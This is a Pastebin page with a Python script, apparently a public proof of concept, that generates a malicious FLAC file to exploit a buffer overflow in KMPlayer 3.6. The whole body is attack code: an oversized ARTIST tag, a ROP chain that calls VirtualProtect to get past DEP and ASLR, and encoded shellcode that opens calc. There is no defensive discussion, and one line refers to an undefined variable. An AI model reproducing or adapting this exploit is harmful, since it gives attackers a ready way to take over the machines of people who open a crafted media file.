Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from socket import *
- import sys
- import struct
- import time
- """
- Kmplayer 3.6 Buffer Overflow exploit
- *Very* Low Reliablity :I
- By sweetchip
- """
- print "\n[*] Kmplayer Exploit | Bypadd ASLR. DEP | ASCII only"
- print "[*] Author : sweetchip | 2013.04.18\n"
- print "[*] Public Release Date : 2015.11.12"
- filename = "Exploit_bypass_ASLR_DEP.flac"
- # Header
- Head1 = ("\x66\x4C\x61\x43\x00\x00\x00\x22\x10\x00\x10\x00\x00\x0B\x3E\x00\x2E"
- "\x50\x0B\xB8\x02\xF0\x00\x91\x57\x93\x6F\x0C\x93\x12\xF9\xE0\x24\xF7"
- "\x6B\x80\x38\x24\x7A\xBC\x64\x5A\x04")
- head2 = "\x00\x00\x00\x01\x00\x00\x00"
- EndofHead = ("\x81\x00\xA4\x46")
- # cmd = calc
- # encoder - x86/alpha_mixed
- shellcode = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
- "\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
- "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42"
- "\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x7a\x48"
- "\x6c\x49\x55\x50\x53\x30\x43\x30\x55\x30\x4c\x49\x49\x75"
- "\x54\x71\x4e\x32\x32\x44\x6c\x4b\x33\x62\x70\x30\x4e\x6b"
- "\x62\x72\x56\x6c\x4c\x4b\x72\x72\x44\x54\x4e\x6b\x71\x62"
- "\x35\x78\x64\x4f\x4d\x67\x42\x6a\x57\x56\x44\x71\x59\x6f"
- "\x70\x31\x79\x50\x6e\x4c\x77\x4c\x70\x61\x61\x6c\x46\x62"
- "\x44\x6c\x55\x70\x5a\x61\x68\x4f\x54\x4d\x67\x71\x58\x47"
- "\x6a\x42\x58\x70\x32\x72\x71\x47\x4e\x6b\x46\x32\x52\x30"
- "\x4e\x6b\x30\x42\x75\x6c\x75\x51\x6a\x70\x6e\x6b\x31\x50"
- "\x50\x78\x4d\x55\x69\x50\x53\x44\x72\x6a\x37\x71\x38\x50"
- "\x66\x30\x4e\x6b\x37\x38\x64\x58\x4e\x6b\x43\x68\x77\x50"
- "\x36\x61\x59\x43\x6a\x43\x67\x4c\x73\x79\x4c\x4b\x54\x74"
- "\x4e\x6b\x77\x71\x7a\x76\x55\x61\x79\x6f\x65\x61\x69\x50"
- "\x4e\x4c\x69\x51\x5a\x6f\x44\x4d\x46\x61\x78\x47\x50\x38"
- "\x49\x70\x30\x75\x4a\x54\x65\x53\x71\x6d\x38\x78\x75\x6b"
- "\x73\x4d\x65\x74\x72\x55\x59\x72\x62\x78\x4c\x4b\x53\x68"
- "\x36\x44\x57\x71\x69\x43\x62\x46\x6e\x6b\x74\x4c\x42\x6b"
- "\x4c\x4b\x31\x48\x47\x6c\x63\x31\x78\x53\x6c\x4b\x37\x74"
- "\x4e\x6b\x33\x31\x4a\x70\x6d\x59\x42\x64\x44\x64\x47\x54"
- "\x51\x4b\x33\x6b\x35\x31\x31\x49\x33\x6a\x73\x61\x79\x6f"
- "\x59\x70\x62\x78\x33\x6f\x33\x6a\x4e\x6b\x64\x52\x5a\x4b"
- "\x6c\x46\x53\x6d\x30\x6a\x33\x31\x6c\x4d\x4e\x65\x4f\x49"
- "\x45\x50\x33\x30\x37\x70\x36\x30\x51\x78\x46\x51\x6c\x4b"
- "\x50\x6f\x6e\x67\x79\x6f\x78\x55\x4f\x4b\x48\x70\x4d\x65"
- "\x6c\x62\x31\x46\x33\x58\x6c\x66\x4c\x55\x6f\x4d\x4d\x4d"
- "\x4b\x4f\x48\x55\x35\x6c\x55\x56\x63\x4c\x77\x7a\x6d\x50"
- "\x79\x6b\x39\x70\x74\x35\x45\x55\x4f\x4b\x62\x67\x46\x73"
- "\x74\x32\x42\x4f\x63\x5a\x45\x50\x53\x63\x69\x6f\x4b\x65"
- "\x55\x33\x43\x51\x52\x4c\x61\x73\x37\x70\x41\x41")
- #############################################################################################################################################
- ##### ROP
- ##### special thanks to mona and corelan team
- #############################################################################################################################################
- rop_gadgets = ""
- rop_gadgets += struct.pack('<I',0x10064b1f)# XCHG EAX,ESP # RETN ** [PProcDLL.dll] ** | ascii {PAGE_EXECUTE_READ}
- rop_gadgets += struct.pack('<L',0x10126c47) #POP EAX # RETN ** [PProcDLL.dll] ** | ascii {PAGE_EXECUTE_READ}
- rop_gadgets += struct.pack('<L',0x11047e74) # ptr to &VirtualProtect() [IAT bass.dll]
- rop_gadgets += struct.pack('<L',0x11024559) # ADD EAX,10B0 # RETN 0x04 ** [bass.dll] ** | ascii {PAGE_EXECUTE_READWRITE}
- rop_gadgets += struct.pack('<L',0x11024559) # ADD EAX,10B0 # RETN 0x04 ** [bass.dll] ** | ascii {PAGE_EXECUTE_READWRITE}
- rop_gadgets += "DEAD"
- rop_gadgets += struct.pack('<L',0x11024559) # ADD EAX,10B0 # RETN 0x04 ** [bass.dll] ** | ascii {PAGE_EXECUTE_READWRITE}
- rop_gadgets += "BEEF"
- rop_gadgets += struct.pack('<L',0x11024559) # ADD EAX,10B0 # RETN 0x04 ** [bass.dll] ** | ascii {PAGE_EXECUTE_READWRITE}
- rop_gadgets += "SWEE"
- rop_gadgets += struct.pack('<L',0x10120637) * 337 # INC EAX # RETN ** [PProcDLL.dll] ** | ascii {PAGE_EXECUTE_READ}
- rop_gadgets += struct.pack('<L',0x11022f69) # MOV EAX,DWORD PTR DS:[EAX] # RETN [bass.dll]
- rop_gadgets += struct.pack('<L',0x11033e30) # XCHG EAX,ESI # RETN [bass.dll]
- rop_gadgets += struct.pack('<L',0x10060210) # POP EBP # RETN ** [PProcDLL.dll] ** | ascii {PAGE_EXECUTE_READ}
- rop_gadgets += struct.pack('<L',0x10146f65) # PUSH ESP # RETN ** [PProcDLL.dll] ** | ascii {PAGE_EXECUTE_READ}
- rop_gadgets += struct.pack('<L',0x11010754) # POP EBX # RETN ** [bass.dll] ** | ascii {PAGE_EXECUTE_READWRITE}
- rop_gadgets += struct.pack('<L',0x00005050) # 0x00000201-> ebx
- rop_gadgets += struct.pack('<L',0x10126623) # POP EDX # RETN ** [PProcDLL.dll] ** | ascii {PAGE_EXECUTE_READ}
- rop_gadgets += struct.pack('<L',0x00000040) # 0x00000040-> edx
- rop_gadgets += struct.pack('<L',0x1013555c) # POP ECX # RETN ** [PProcDLL.dll] ** | ascii {PAGE_EXECUTE_READ}
- rop_gadgets += struct.pack('<L',0x7d782020) # Writable location 7d782020
- rop_gadgets += struct.pack('<L',0x10120b13) # POP EDI # RETN ** [PProcDLL.dll] ** | ascii {PAGE_EXECUTE_READ}
- rop_gadgets += struct.pack('<L',0x100d0240) # RETN (ROP NOP) [bass_wv.dll]
- rop_gadgets += struct.pack('<L',0x10126c47) # POP EAX # RETN ** [PProcDLL.dll] ** | ascii {PAGE_EXECUTE_READ}
- rop_gadgets += struct.pack('<L',0x44444444) # inc inc inc inc lol
- rop_gadgets += struct.pack('<L',0x1001442e) # PUSHAD # RETN ** [PProcDLL.dll] ** | ascii {PAGE_EXECUTE_READ}
- #############################################################################################################################################
- stage1 = ""
- stage1 += "C" * 3028
- stage1 += rop_gadgets
- stage1 += shellcode
- #65536
- # trigger a BOF / and will Execute shellcode
- artist = "ARTIST="
- artist += "A" * 60000
- artist += "A" * 4848
- artist += struct.pack('<I', 0x7d79192c)
- artist += "A" * 137
- artist += struct.pack('<I', 0x10402f0f) # POP ESP # RETN ** [bass_flac.dll] ** | ascii {PAGE_EXECUTE_READWRITE}
- artist += struct.pack('<I', 0x7d791930) # ptr to 7d761930
- artist += "B" * (140000 -4848-4-4-4-137)
- artist += stage1
- artist += "Z" * (65536-len(stage1))
- artist += stage1
- artist += "Z" * (65536-len(stage1))
- artist += stage1
- artist += "Z" * (65536-len(stage1))
- artist += stage1
- artist += "Z" * (65536-len(stage1))
- artist += stage1
- artist += "Z" * (65536-len(stage1))
- artist += stage1
- artist += "Z" * (65536-len(stage1))
- artist += stage1
- artist += "Z" * (65536-len(stage1))
- #artist += "C" * 3028
- #artist += rop_gadgets
- #artist += shellcode
- sartist += "A" * 100000
- artistlength = struct.pack('<I', len(artist))
- # length
- payloadlen = struct.pack('>I', len(head2 + EndofHead + artistlength + artist)*256)
- # Payload.
- exploit = Head1
- exploit += payloadlen
- exploit += head2
- exploit += artistlength
- exploit += artist
- exploit += EndofHead
- exploit += "\x00" * 118000
- print "\n[*] Generating Flac file....."
- print "[ ] Payload size :", (len(exploit))
- print "[ ] Shellcode size : \n"
- f = open(filename,'w')
- f.write(exploit)
- f.close()
- print "[*] Malicious File generated Successfully!!!"
- print "[ ] file name : " + filename
- raw_input("\npress enter to continue :D . . . . .")
- #End OF Source.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement